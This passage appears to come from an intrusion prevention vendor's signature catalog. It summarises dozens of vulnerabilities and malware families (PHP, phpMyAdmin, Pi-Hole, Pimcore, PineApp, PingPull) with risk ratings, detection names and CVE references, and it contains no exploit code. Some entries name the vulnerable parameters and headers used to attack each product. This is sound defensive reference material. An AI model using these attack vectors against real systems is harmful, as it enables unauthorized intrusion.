Description: A heap memory corruption vulnerability exists in xml_parse_into_struct() function in PHP. The vulnerability is due to an error in parsing XML strings passed to the function. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.
Situation: HTTP_CRL-Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption
References:
CVE-2013-4113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113
BID-61128
http://www.securityfocus.com/bid/61128
OSVDB-95152
http://www.osvdb.org/95152
Back to top

Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution

About this vulnerability: A vulnerability in PHP
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: There exists an arbitrary code execution vulnerability in PHP.
Situation: File-Text_Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution
References:
CVE-2017-5340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5340
BID-95371
http://www.securityfocus.com/bid/95371
Back to top

PHP-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow

About this vulnerability: A vulnerability in PHP Group PHP
Risk: Moderate
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Integer Overflow
Description: An error in reading zip files with the getFromIndex() and getFromName() of PHP ZipArchiver, can cause a heap buffer overflow. A crafted ZIP file can be used to gain code execution privileges on the target.
Situation: File-Zip_PPH-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow
References:
CVE-2016-3078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3078
Back to top

Phpbb-Sessions-Php-Autologinid-Authentication-Bypass

About this vulnerability: Authentication bypass vulnerability in Phpbb sessions.php
Risk: High
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PhpBB
Type: Malfunction
Description: Phpbb Web bulletin board software contains a flaw in sessions.php that allows unauthorized users to gain administrative privileges due to a failure of sanitizing certain script variables. A remote attacker could set a specially crafted cookie pointing to the known administrator id to bypass the authentication and to execute arbitrary commands on the vulnerable system.
Situation: HTTP_CSU-Phpbb-Sessions-Php-Autologinid-Authentication-Bypass
References:
CVE-2005-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0614
BID-12678
http://www.securityfocus.com/bid/12678
OSVDB-14242
http://www.osvdb.org/14242
Back to top

PhpFileManager-Cmd-Parameter-Command-Execution

About this vulnerability: A vulnerability in phpFileManager
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1607-5242
Platform: Generic
Software: phpFileManager
Type: Input Validation
Description: A remote command execution vulnerability exists in phpFileManager. The vulnerability is due to a design weakness when handling HTTP requests with "action" parameter set to 6. A remote user can exploit this vulnerability by injecting arbitrary command in the "cmd" parameter. Successful exploitation will results in arbitrary code execution on the target system under the security context of the affected web server.
Situation: HTTP_CRL-PhpFileManager-Cmd-Parameter-Command-Execution
Back to top

Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in phpGACL
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: phpGACL
Type: Input Validation
Description: Insufficient validation of the 'action' parameter in HTTP requests causes a cross-site scripting vulnerability in phpGACL. A successful exploit allows an attacker to run scripts in a user's browser.
Situation: HTTP_CSU-Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting
References:
CVE-2020-13562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13562
Back to top

PhpGedView-PGV-Base-Directory-Php-Injection

About this vulnerability: PHP code injection vulnerability in PhpGedView
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1637-5242
Platform: Unix
Software: PhpGedView
Type: PHP Injection
Description: PHPGEDVIEW up to version 2.65.1 allows a remote attacker to point the PGV_BASE_DIRECTORY parameter to a remote Web server that can contain malicious code.
References:
CVE-2004-0030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030
BID-9368
http://www.securityfocus.com/bid/9368
OSVDB-3343
http://www.osvdb.org/3343
Back to top

phpLDAPadmin-Remote-PHP-Code-Injection

About this vulnerability: A phpLDAPadmin Remote PHP Code Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpLDAPadmin
Type: PHP Injection
Description: A vulnerability in phpLDAPadmin, versions 1.2.x before 1.2.2, that allows remote attackers to execute arbitrary PHP code via the orderby parameter in a query_engine action to cmd.php.
Situation: HTTP_CRL-phpLDAPadmin-Remote-PHP-Code-Injection
References:
CVE-2011-4075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4075
BID-50331
http://www.securityfocus.com/bid/50331
OSVDB-76594
http://www.osvdb.org/76594
Back to top

PHPMailer-Mail-Escapeshellarg-Command-Injection

About this vulnerability: A vulnerability in PHPMailer
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1654-5242
Platform: Generic
Software: PHPMailer
Type: Input Validation
Description: There exists a command injection vulnerability in PHPMailer library package. A remote, unauthenticated attacker can use this to execute arbitrary commands on the affected system.
Situation: HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection-2
HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection
References:
CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045
Back to top

PHPMailer-Mail-Sender-Command-Injection

About this vulnerability: A vulnerability in PHPMailer libphp-phpmailer
Risk: Moderate
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHPMailer
Type: Input Validation
Description: Insufficient sanitization of request parameters causes a command injection vulnerability in PHPMailer libphp-phpmailer. A successful exploitation allows an attacker to execute code with the server process privileges.
Situation: HTTP_CRL-PHPMailer-Mail-Sender-Command-Injection
References:
CVE-2016-10033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033
Back to top

PHPMoAdmin-Remote-Code-Execution

About this vulnerability: PHPMoAdmin Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHPMoAdmin
Type: PHP Injection
Description: A vulnerability in PHPMoAdmin 1.1.2 which allows remote attackers to execute arbitrary commands, via shell metacharacters, in the object parameter of the saveObject function in moadmin.php.
Situation: HTTP_CRL-PHPMoAdmin-Remote-Code-Execution
References:
CVE-2015-2208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2208
Back to top

Phpmyadmin-Index.php-Local-File-Inclusion

About this vulnerability: A vulnerability in phpMyAdmin Devel Team phpMyAdmin
Risk: Moderate
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: There has been reported a local file inclusion vulnerability in phpMyAdmin. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary code execution.
Situation: HTTP_CRL-Phpmyadmin-Index.php-Local-File-Inclusion
References:
CVE-2018-12613
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613
Back to top

Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in phpMyAdmin Devel Team phpMyAdmin
Risk: Moderate
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: There has been reported a stored cross-site scripting vulnerability in phpMyAdmin. This vulnerability can be exploited by an authenticated attacker. Successful exploitation results in the execution of arbitrary script code in the browser.
Situation: HTTP_CRL-Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting
References:
CVE-2018-19970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19970
Back to top

Phpmyadmin-Preg_Replace-Function-Code-Injection

About this vulnerability: A vulnerability in phpMyAdmin Devel Team phpMyAdmin
Risk: Moderate
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: A vulnerability has been reported in phpMyAdmin, a web-based administration console for MySQL servers. This vulnerability could allow remote attackers to execute arbitrary code on the vulnerable system. The vulnerability is due to an input validation error when handling queries of the types replace_prefix_tbl or copy_tbl_change_prefix to db_structure.php. A remote, authenticated attacker could exploit this vulnerability by sending a malicious POST request. Successful exploitation may lead to arbitrary PHP code execution in the security context of the HTTP server.
Situation: HTTP_CRL-Phpmyadmin-Preg_Replace-Function-Code-Injection
References:
CVE-2013-3238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3238
OSVDB-92793
http://www.osvdb.org/92793
Back to top

Phpmyadmin-Searchcontroller-SQL-Injection

About this vulnerability: A vulnerability in phpMyAdmin Devel Team phpMyAdmin
Risk: Moderate
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: The lack of escaping and input validation on user-supplied input causes a SQL injection vulnerability in phpMyAdmin. A successful exploit allows a remote attacker to execute arbitrary SQL statements with the privileges of the target.
Situation: File-Text_Phpmyadmin-Searchcontroller-SQL-Injection
References:
CVE-2020-26935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935
Back to top

Phpmyadmin-Server_sync.php-Backdoor

About this vulnerability: A phpMyAdmin server_sync.php Backdoor vulnerability.
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Backdoor
Description: A compromised version of phpMyAdmin, version 3.5.2.2, distributed during 2012, contains an externally introduced modification in server_sync.php which allows remote attackers to execute arbitrary PHP code via an eval injection attack.
Situation: HTTP_CSU_Phpmyadmin-Server_sync.php-Backdoor
References:
CVE-2012-5159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5159
BID-55672
http://www.securityfocus.com/bid/55672
OSVDB-85739
http://www.osvdb.org/85739
Back to top

Phpmyadmin-SQL-Goto-Remote-File-Include-Vulnerability

About this vulnerability: PhpMyAdmin Remote File Include Vulnerability
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: The phpMyAdmin is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.
Situation: HTTP_CRL-Phpmyadmin-SQL-Goto-Remote-Code-Injection-Compromise
Back to top

Phpmyadmin-Static-Code-Injection-Vulnerability-CVE-2009-1151

About this vulnerability: Static code injection vulnerability in setup.php in phpMyAdmin
Risk: High
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file. Successful exploitation leads to remote system compromise.
Situation: HTTP_CSU-Phpmyadmin-Code-Injection-Remote-Compromise
References:
CVE-2009-1151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1151
BID-34236
http://www.securityfocus.com/bid/34236
Back to top

Phpmyadmin-Tbl_replace.php-Local-File-Inclusion

About this vulnerability: A vulnerability in phpMyAdmin
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Input Validation
Description: A vulnerability in phpMyAdmin, versions 4.0 through 4.8.3, which results in information disclosure or allows remote attackers to execute arbitrary code due to the lack of sanitization of a column in the column info table when tbl_replace.php is executed.
Situation: HTTP_CS-Phpmyadmin-Tbl_replace.php-Local-File-Inclusion
References:
CVE-2018-19968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19968
Back to top

phpScheduleIt-PHP-Code-Injection-Vulnerability

About this vulnerability: A vulnerability in phpScheduleIt reserve.php
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpScheduleIt
Type: PHP Injection
Description: A vulnerability in phpScheculeIt reserve.php which allows remote attackers to execute arbitrary PHP code via the start_date_parameter.
Situation: HTTP_CRL-phpScheduleIt-PHP-Code-Injection-Vulnerability
References:
CVE-2008-6132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6132
BID-31520
http://www.securityfocus.com/bid/31520
OSVDB-48797
http://www.osvdb.org/48797
Back to top

PHPStudy-Backdoor-Remote-Code-Execution

About this vulnerability: A vulnerability in PHPStudy
Risk: High
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Platform: Generic
Software: PHPStudy
Type: Input Validation
Description: There exists a vulnerability in PHPStudy, versions 2016-2018, which allows remote attackers to execute arbitrary code through the Accept-Charset header if the Accept-Encoding header is set to gzip,deflate.
Situation: HTTP_CS-PHPStudy-Backdoor-Remote-Code-Execution
Back to top

PHPUnit-Remote-Code-Execution-CVE-2017-9841

About this vulnerability: An attempt to exploit a vulnerability in PHPUnit
Risk: High
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Generic
Software: PHPUnit
Type: Insecure Configuration
Description: A pre-auth remote code execution vulnerability has been reported in PHPUnit versions before 4.8.28 and 5.6.3. This vulnerability allows attackers to execute arbitrary PHP code via crafted HTTP requests to eval-stdin.php in an externally exposed /vendor folder.
Situation: HTTP_CSU-PHPUnit-Remote-Code-Execution-CVE-2017-9841
References:
CVE-2017-9841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9841
Back to top

PHPWAY-Link-Management-Script-Multiple-File-Inclusion-Vulnerabilities

About this vulnerability: File inclusion vulnerabilities in PHPWAY Link Management Script
Risk: High
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHPWAY Link Management Script
Type: Input Validation
Description: There is a file inclusion vulnerability in the PHPWAY Link Management Script. The script does not validate input of various parameters, allowing remote file inclusion and execution of PHP script code in the context of the web server.
Situation: HTTP_CRL-PHPWAY-Link-Management-Script-Main-Page-Directory-Remote-File-Inclusion
HTTP_CRL-PHPWAY-Link-Management-Script-Page-To-Include-Remote-File-Inclusion
References:
CVE-2008-2270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2270
BID-29234
http://www.securityfocus.com/bid/29234
Back to top

Phpwiki-Ploticus-Remote-Code-Execution

About this vulnerability: A Phpwiki Ploticus Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Phpwiki Ploticus
Type: Code Injection
Description: A vulnerability in Phpwiki Ploticus, version 1.5.0, which allow remote attackers to execute arbitrary code via shell metacharacters in the edit[content] parameter to index.php/HeIp.
Situation: HTTP_CRL-Phpwiki-Ploticus-Remote-Code-Execution
References:
CVE-2014-5519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5519
OSVDB-110576
http://www.osvdb.org/110576
Back to top

Pi-Hole-Blocklist-OS-Command-Execution

About this vulnerability: A vulnerability in Pi-Hole
Risk: High
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pihole
Type: Input Validation
Description: There exists a vulnerability in Pi-Hole, versions 4.4 and before, which allows remote attackers to execute arbitrary commands by forcing an update which includes PHP content within the new blocklist.
Situation: HTTP_CRL-Pi-Hole-Blocklist-OS-Command-Execution
References:
CVE-2020-11108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11108
Back to top

Pi-Hole-DHCP-Mac-OS-Command-Execution

About this vulnerability: A vulnerability in Pi-Hole
Risk: High
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Pihole
Type: Input Validation
Description: There exists a vulnerability in Pi-Hole, versions 4.3.2 and before, which allows remote attackers to execute arbitrary commands by adding a MAC address, which includes an RCE, to a new DHCP static lease.
Situation: HTTP_CRL-Pi-Hole-DHCP-Mac-OS-Command-Execution
References:
CVE-2020-8816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8816
Back to top

Pi-Hole-Top-Domains-API-Authenticated-Exec

About this vulnerability: An attempt to exploit a vulnerability in the Pi-Hole Web Interface.
Risk: High
First detected in: sgpkg-ips-1434-5242
Last changed: sgpkg-ips-1434-5242
Platform: Generic
Software: Pi-Hole
Type: Input Validation
Description: A vulnerability in the the Pi-Hole Web Interface, versions 5.5 and before, which allows remote attackers to execute arbitrary code via the domains parameter, due to insufficient validation.
Situation: HTTP_CS-Pi-Hole-Top-Domains-API-Authenticated-Exec
References:
CVE-2021-32706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32706
Back to top

Pi-Hole-Whitelist-OS-Command-Execution

About this vulnerability: A vulnerability in Pi-Hole
Risk: High
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Platform: Linux
Software: Pihole
Type: Input Validation
Description: There exists a vulnerability in Pi-Hole, versions 3.3 and before, which allows remote attackers to execute arbitrary code by appending system commands to the domain parameter when adding a new domain.
Situation: HTTP_CRL-Pi-Hole-Whitelist-OS-Command-Execution
Back to top

Pi3Web-ISAPI-Denial-of-Service

About this vulnerability: A Pi3Web ISAPI Denial of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: John Roy Pi3Web
Type: Input Validation
Description: A vulnerability in Pi3Web, version 2.0.3 before PL2, which allows remote attackers to cause a denial of service condition by sending a request to a file in the ISAPI directory that is not an executable DLL.
Situation: HTTP_CSU_Pi3Web-ISAPI-Denial-of-Service
References:
CVE-2008-6938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6938
OSVDB-49998
http://www.osvdb.org/49998
Back to top

PicoFlat-Pagina-Parameter-File-Inclusion

About this vulnerability: File inclusion vulnerability in PicoFlat
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PicoFlat
Type: Input Validation
Description: There is a file inclusion vulnerability in PicoFlat content manangement system written in PHP scripting language. The software does not validate parameters for the main script correctly allowing inclusion and execution of arbitary PHP code in the context of the web server process.
Situation: HTTP_CRL-PicoFlat-Pagina-Parameter-File-Inclusion
References:
CVE-2007-5390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5390
BID-26043
http://www.securityfocus.com/bid/26043
OSVDB-37686
http://www.osvdb.org/37686
Back to top

Pidgin-MSN-MSNP2P-Message-Integer-Overflow

About this vulnerability: Integer overflow vulnerability in Pidgin instant messaging client
Risk: Moderate
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Pidgin
Type: Buffer Overflow
Description: There is an integer overflow vulnerability in Pidgin instant messaging client. By sending a crafted MSNP2P message to the target, a remote attacker can cause a denial of service condition terminating the vulnerable Pidgin process, or execute non-privileged arbitrary code on the target host.
Situation: HTTP_SS-Pidgin-MSN-MSNP2P-Message-Integer-Overflow
IM-TCP_Pidgin-MSN-MSNP2P-Message-Integer-Overflow
File-Binary_Pidgin-MSN-MSNP2P-Message-Integer-Overflow
References:
CVE-2008-2927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927
BID-29956
http://www.securityfocus.com/bid/29956
OSVDB-46838
http://www.osvdb.org/46838
Back to top

Pihole-Blocklist-Exec-CVE-2020-11108

About this vulnerability: Pihole Blocklist Exec CVE-2020-11108
Risk: High
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Pihole
Type: Malfunction
Description: Requests with suitably crafted payloads can make Pihole download and execute arbitrary PHP code from any URL, which can be exploited to execute any code on the target system with the privileges of the daemon.
Situation: HTTP_CRL-Pihole-Blocklist-Exec-CVE-2020-11108
References:
CVE-2020-11108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11108
Back to top

Pimcore-Gridhelperservice-SQL-Injection

About this vulnerability: A vulnerability in Pimcore
Risk: Moderate
First detected in: sgpkg-ips-1470-5242
Last changed: sgpkg-ips-1470-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: Improper input validation in the /grid-proxy, /get-export-jobs, and /get-batch-jobs APIs causes an SQL injection vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Pimcore-Gridhelperservice-SQL-Injection
References:
CVE-2022-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1429
Back to top

Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection

About this vulnerability: A vulnerability in Pimcore
Risk: High
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: A SQL injection vulnerability has been reported for Pimcore. This vulnerability is due to improper input validation in the prepareListingForGrid function. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CRL-Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection
References:
CVE-2023-3820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3820
Back to top

Pimcore-Key-Field-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Pimcore Pimcore
Risk: Moderate
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1448-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: Improper validation of the input for the Key field in the Navigation and Properties tab causes a cross-site scripting vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CS-Pimcore-Key-Field-Stored-Cross-Site-Scripting
References:
CVE-2022-0831
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0831
Back to top

Pimcore-Multiselect-Getfilterconditionext-SQL-Injection

About this vulnerability: A vulnerability in Pimcore
Risk: Moderate
First detected in: sgpkg-ips-1662-5242
Last changed: sgpkg-ips-1662-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: Improper input validation in the getFilterConditionExt function causes an SQL injection vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Pimcore-Multiselect-Getfilterconditionext-SQL-Injection
References:
CVE-2023-47637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47637
Back to top

Pimcore-Rest-API-SQL-Injection

About this vulnerability: A vulnerability in Pimcore web servies
Risk: High
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pimcore
Type: SQL Injection
Description: A vulnerability in the Pimcore web service REST API which allows remote attackers to obtain usernames and hashed passwords using an SQL injection.
Situation: HTTP_CSU-Pimcore-Rest-API-SQL-Injection
References:
CVE-2018-14058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14058
Back to top

Pimcore-Searchcontroller.PHP-SQL-Injection

About this vulnerability: A vulnerability in Pimcore
Risk: Moderate
First detected in: sgpkg-ips-1595-5242
Last changed: sgpkg-ips-1595-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: Improper input validation in the search function causes an SQL injection vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Pimcore-Searchcontroller.PHP-SQL-Injection
References:
CVE-2023-1578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1578
Back to top

Pimcore-Title-Field-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Pimcore Pimcore
Risk: Moderate
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: Improper input validation for the Title field in the SEO and Settings tab causes a cross-site scripting vulnerability in Pimcore. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Pimcore-Title-Field-Stored-Cross-Site-Scripting
References:
CVE-2022-0832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0832
Back to top

Pimcore-Unserialize-RCE

About this vulnerability: A vulnerability in Pimcore
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Pimcore
Type: Input Validation
Description: A vulnerability in Pimcore, versions 4.x and 5.x, which allows remote attackers to execute arbitrary code due to the lack of proper input validation of the bulk-commit method in ClassController.php.
Situation: HTTP_CRL-Pimcore-Unserialize-RCE
References:
CVE-2019-10867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10867
Back to top

Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection

About this vulnerability: A vulnerability in PineApp Mail-SeCure
Risk: High
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: PineApp Mail-SeCure
Type: Input Validation
Description: A command injection vulnerability exists in PineApp Mail-SeCure. The vulnerability is due to an input validation error in conflivelog.pl of the administration interface. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.
Situation: HTTP_CRL-Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection
References:
OSVDB-95780
http://www.osvdb.org/95780
Back to top

Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection

About this vulnerability: A vulnerability in PineApp Mail-SeCure
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: PineApp Mail-SeCure
Type: Input Validation
Description: A command execution vulnerability exists in PineApp Mail-SeCure. The vulnerability is due to an input validation error in the confpremenu.php script while exporting logs. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.
Situation: HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection
References:
OSVDB-95783
http://www.osvdb.org/95783
Back to top

Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection

About this vulnerability: A vulnerability in PineApp Mail-SeCure
Risk: High
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: PineApp Mail-SeCure
Type: Input Validation
Description: A command execution vulnerability exists in PineApp Mail-SeCure. The vulnerability is due to an input validation error in the confpremenu.php script while installing licenses. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.
Situation: HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection
References:
OSVDB-95784
http://www.osvdb.org/95784
Back to top

Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution

About this vulnerability: A vulnerability in PineApp Mail-SeCure
Risk: Moderate
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: PineApp Mail-SeCure
Type: Malfunction
Description: There is a remote command execution vulnerability in PineApp Mail-SeCure. The vulnerability is due to exposing of the ldapsyncnow.php file of the administration web interface. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with the privileges of the root user.
Situation: HTTP_CSU-Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution
References:
OSVDB-95781
http://www.osvdb.org/95781
Back to top

Pineapp-Mail-Secure-Livelog-Command-Injection

About this vulnerability: A vulnerability in PineApp Mail-SeCure
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: PineApp Mail-SeCure
Type: Input Validation
Description: There are multiple command Injection vulnerabilities in PineApp Mail-SeCure. These vulnerabilities are due to an input validation errors in the livelog.html of the administration interface. A remote attacker can exploit these vulnerabilities by sending specially crafted requests to the vulnerable server. Successful exploitation could result in commands being executed with root privileges.
Situation: HTTP_CRL-Pineapp-Mail-Secure-Livelog-Command-Injection
References:
OSVDB-95779
http://www.osvdb.org/95779
Back to top

Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection

About this vulnerability: A vulnerability in PineApp Mail-SeCure
Risk: Moderate
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: PineApp Mail-SeCure
Type: Input Validation
Description: There is a command injection vulnerability in PineApp Mail-SeCure. The vulnerability is due to lack of sanitation on the iptest parameter in test_li_connection.php of the administration web interface. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. Successful exploitation could result in commands being executed with the privileges of the root user.
Situation: HTTP_CRL-Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection
References:
OSVDB-95782
http://www.osvdb.org/95782
Back to top

PingPull-Trojan-C2-Traffic

About this vulnerability: PingPull remote access trojan command and control traffic
Risk: High
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: PingPull is a remote access trojan that can be used to control the infected system.
Situation: HTTP_CS-PingPull-Trojan-C2-HTTP-Traffic
Generic_CS-PingPull-Trojan-C2-TCP-Traffic
ICMP_PingPull-Trojan-C2-ICMP-Echo-Request-Traffic
Back to top

Pinkslip-Bot

About this vulnerability: PinkSlip bot traffic detected
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: PinkSlip is a Windows malware that can be remote controlled.
